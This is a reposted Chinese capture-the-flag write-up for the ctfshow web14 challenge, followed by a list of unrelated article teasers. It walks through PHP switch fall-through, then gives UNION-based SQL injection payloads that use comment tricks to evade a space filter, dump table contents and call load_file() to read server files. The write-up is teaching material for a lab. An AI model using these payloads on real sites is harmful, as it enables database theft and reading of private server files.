ctfshow_web14------（PHP+switch case 穿透+SQL注入+文件讀取）

ctfshow_web14------（PHP+switch case 穿透+SQL注入+文件讀取）

news/2025/9/12 13:08:03/文章來源:https://blog.csdn.net/hello_mszcc/article/details/151589010

題目：

解釋：$c = intval($_GET['c']); //獲取整數值 6

? ? ? ? ? ?sleep($c);//延遲執行當前腳本若干秒。

提示一下哈沒有break會接著執行下面的

但是像是44444，555555,sleep的時間太久

我們用3

進入here_1s_your_f1ag.php是一個查詢頁面，sql注入

查看源碼

過濾的關鍵詞有information_schema.tables，information_schema.columns，linestring，空格，polygon。

查字段數

爆庫名

payload:query=-1/**/union/**/select/**/database()

爆表名

query=-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema='web'

爆列名

query=-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_schema='web'/**/and/**/table_name='content'

爆值

query=-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content

這里沒有flag

有一條提示tell you a secret,secert has a secret…?所以很有可能flag在secret.php中

如何讀取???

mysql提供了讀取本地文件的函數load_file()

要權限，用user()看一下權限是root可以用load_file()讀

Wappalyzer 識別到 Nginx，網站默認根目錄：/var/www/html/。

payload: ?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")/**/#

查看源碼

真正的flag找到了

payload:?query=-1/**/union/**/select/**/load_file("/real_flag_is_here")/**/#

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/922010.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/922010.shtml
英文地址，請注明出處：http://en.pswp.cn/news/922010.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！

相關文章

linux x86_64中打包qt

linux x86_64中打包qt

下載安裝地址: Releases linuxdeploy/linuxdeploy mv linuxdeploy-x86_64.AppImage linuxdeployqtchmod 777 linuxdeployqtsudo mv linuxdeployqt /usr/local/bin/linuxdeployqt --version報錯 Applmage默認依賴FUSE，需要掛載自身為虛擬文件系統才能運行, ubuntu…

閱讀更多...

華為昇騰CANN開發實戰：算子自定義與模型壓縮技術指南

華為昇騰CANN開發實戰：算子自定義與模型壓縮技術指南

點擊 “AladdinEdu，同學們用得起的【H卡】算力平臺”，注冊即送-H卡級別算力，80G大顯存，按量計費，靈活彈性，頂級配置，學生更享專屬優惠。摘要隨著人工智能技術的飛速發展，越來越多…

閱讀更多...

Vue3源碼reactivity響應式篇之reactive響應式對象的track與trigger

Vue3源碼reactivity響應式篇之reactive響應式對象的track與trigger

概覽在BaseReactiveHandler類的get方法中，有如下代碼塊if (!isReadonly2){track(target, "get", key);}，這表示通過reactive、shallowReactive創建的響應式對象，非只讀的，當讀取代理對象proxyTarget的某個屬性key時&am…

閱讀更多...

VRRP 多節點工作原理

VRRP 多節點工作原理

VRRP 多節點工作原理基本概念 VRRP 的設計初衷是給一組節點提供一個虛擬路由器，對外只表現出一個 VIP。協議規定：同一個 VRRP 實例下始終只有一個 Master 持有 VIP，其它全部是 Backup。 Master → 持有 VIP，負責轉發流量到Mas…

閱讀更多...

Gradio全解11——Streaming：流式傳輸的視頻應用（9）——使用FastRTC+Gemini創建沉浸式音頻+視頻的藝術評論家

Gradio全解11——Streaming：流式傳輸的視頻應用（9）——使用FastRTC+Gemini創建沉浸式音頻+視頻的藝術評論家

Gradio全解11——Streaming：流式傳輸的視頻應用（9）——使用FastRTCGemini創建沉浸式音頻視頻的藝術評論家11.9 使用FastRTCGemini創建實時沉浸式音頻視頻的藝術評論家11.9.1 準備工作及音頻圖像編碼器1. 項目說明及準備工作2. 音頻和圖像編碼…

閱讀更多...

Django入門筆記

Django入門筆記

Python知識點：函數、面向對象。前端開發：HTML、CSS、JavaScript、jQuery、BootStrap。MySQL數據庫。Python的Web框架：Flask，自身短小精悍第三方組件。Django，內部已集成了很多組件第三方組件。【主要】1.安裝djang…

閱讀更多...

當Claude Code失靈，Qwen Code能否成為你的救星？

當Claude Code失靈，Qwen Code能否成為你的救星？

當Claude Code失靈，Qwen Code能否成為你的救星？ 一、開頭：點明困境，引出主角作為一個大模型博主，日常工作中我經常會使用各種 AI 工具來提高效率，Claude Code 就是我之前非常依賴的一款代碼生成助手。它…

閱讀更多...

Go語言快速入門教程(JAVA轉go)——1 概述

Go語言快速入門教程(JAVA轉go)——1 概述

優勢第一個理由：對初學者足夠友善，能夠快速上手。業界都公認：Go 是一種非常簡單的語言。Go 的設計者們在發布 Go 1.0 版本和兼容性規范后，似乎就把主要精力放在精心打磨 Go 的實現、改進語言周邊工具鏈，還有提升 Go …

閱讀更多...

【Rust多進程】征服CPU的藝術：Rust多進程實戰指南

【Rust多進程】征服CPU的藝術：Rust多進程實戰指南

?? 歡迎大家來到景天科技苑?? 🎈🎈 養成好習慣，先贊后看哦~🎈🎈 🏆 作者簡介：景天科技苑 🏆《頭銜》：大廠架構師，華為云開發者社區專家博主，…

閱讀更多...

OpenCV 高階實戰：圖像直方圖與掩碼圖像深度解析

OpenCV 高階實戰：圖像直方圖與掩碼圖像深度解析

目錄一、圖像直方圖：讀懂圖像的 “像素分布報告” 1. 什么是圖像直方圖？ 2. 圖像直方圖的核心作用 （1）分析亮度分布 （2）判斷對比度高低 （3）輔助圖像增強與閾值分割 &#xf…

閱讀更多...

基于stm32的家庭安全監測系統設計

基于stm32的家庭安全監測系統設計

若該文為原創文章，轉載請注明原文出處。一、引言（一）研究背景及意義背景：隨著智能家居概念的普及，人們對家庭安全、舒適度和節能提出了更高要求。傳統安防系統功能單一、各系統獨立，缺乏聯動和遠程管理能力…

閱讀更多...

Oracle體系結構-控制文件（Control Files）

Oracle體系結構-控制文件（Control Files）

一、原理 (Principle) 核心定位： 控制文件是一個小型的二進制文件，由 Oracle 實例在啟動和操作過程中持續讀寫。它是數據庫物理結構的權威記錄。數據庫無法啟動或正常操作時，如果無法訪問控制文件，實例將無法識別數據文件和重做日…

閱讀更多...

路由下一跳網關兩個不同網段的ip如何通過路由器互通

路由下一跳網關兩個不同網段的ip如何通過路由器互通

路由 (Routing)核心思想：路徑選擇是什么？ 路由是指數據包從源主機傳輸到目標主機的整個過程。這個過程就像寄快遞：你需要決定包裹經過哪些中轉站才能最終到達收件人手里。做什么？ 網絡中的設備（主要是路由器&#xff0…

閱讀更多...

HiDDeN論文解讀與代碼實現

HiDDeN論文解讀與代碼實現

論文：HiDDeN: Hiding Data With Deep Networks 作者：Jiren Zhu, Russell Kaplan, Justin Johnson, Li Fei-Fei一、研究背景在圖像信息隱藏領域，通常有兩類典型的應用場景：隱寫 (Steganography) 目標：實現秘密通信。要…

閱讀更多...

實驗室服務器配置｜實驗室多人共享GPU｜通過Docker實現Linux系統多用戶隔離與安全防控

實驗室服務器配置｜實驗室多人共享GPU｜通過Docker實現Linux系統多用戶隔離與安全防控

利用實驗室服務器跑實驗的時候，通常就是兩種方案，一個是向日葵遠程桌面進行操作，一個是通過ssh進行連接，用ssh的話，一般服務器都在內網（例如校園網），是無法在公網（不在校…

閱讀更多...

2019考研數學（二）真題

2019考研數學（二）真題

一、選擇題 (1) (2) (3) (4) 遺漏點：由通解知特解，特解代入微分方程 (5) ★記住這個題，用的泰勒展開(6) (7) 遺忘點： ★伴隨矩陣的秩與原矩陣秩的關系： (8) 錯誤點：粗心二、填空題 (9) 易混淆點&#xff…

閱讀更多...

10 分鐘上手 ECharts：從“能跑”到“生產級”的完整踩坑之旅

10 分鐘上手 ECharts：從“能跑”到“生產級”的完整踩坑之旅

10 分鐘上手 ECharts：從“能跑”到“生產級”的完整踩坑筆記如果你也曾復制了官方 Demo 卻不知道怎么拆、窗口一拉伸圖表就變形、切換標簽頁后內存暴漲——這篇博客就是為你寫的。我會用 6 個遞進版本的源碼，帶你把一張最簡柱狀圖逐步進化成可銷毀…

閱讀更多...

二級緩存在實際項目中的應用

二級緩存在實際項目中的應用

二級緩存在項目中的應用目錄 1. 二級緩存簡介2. 應用場景3. 重難點分析4. 結合SpringBoot使用5. 最佳實踐與案例6. 總結 1. 二級緩存簡介 1.1 什么是二級緩存二級緩存（Second-Level Cache） 是Hibernate框架中的一個重要特性，它提供了應…

閱讀更多...

深入淺出CRC校驗：從數學原理到單周期硬件實現（2）CRC數學多項式基礎

深入淺出CRC校驗：從數學原理到單周期硬件實現（2）CRC數學多項式基礎

數學的優雅：剖開CRC的多項式除法核心看似復雜的CRC校驗，其核心建立在優雅的數學基礎之上。本文將為您揭開CRC算法的數學面紗，讓您真正理解多項式除法的精妙之處。模2運算：CRC世界的特殊算術 CRC計算建立在一種特殊的代數系統上——…

閱讀更多...

軟考初級有沒有必要考？

軟考初級有沒有必要考？

對正在學習相關專業的學生或者是行業新人，這篇文章從軟考初級的含義、適合哪些人考、考試難度等方面解答，幫助你判斷要不要報考。一、軟考初級是什么？ 軟考初級是軟考體系里面的基礎級別，主要面向在校大學生或是IT行業新人&#x…

閱讀更多...

最新文章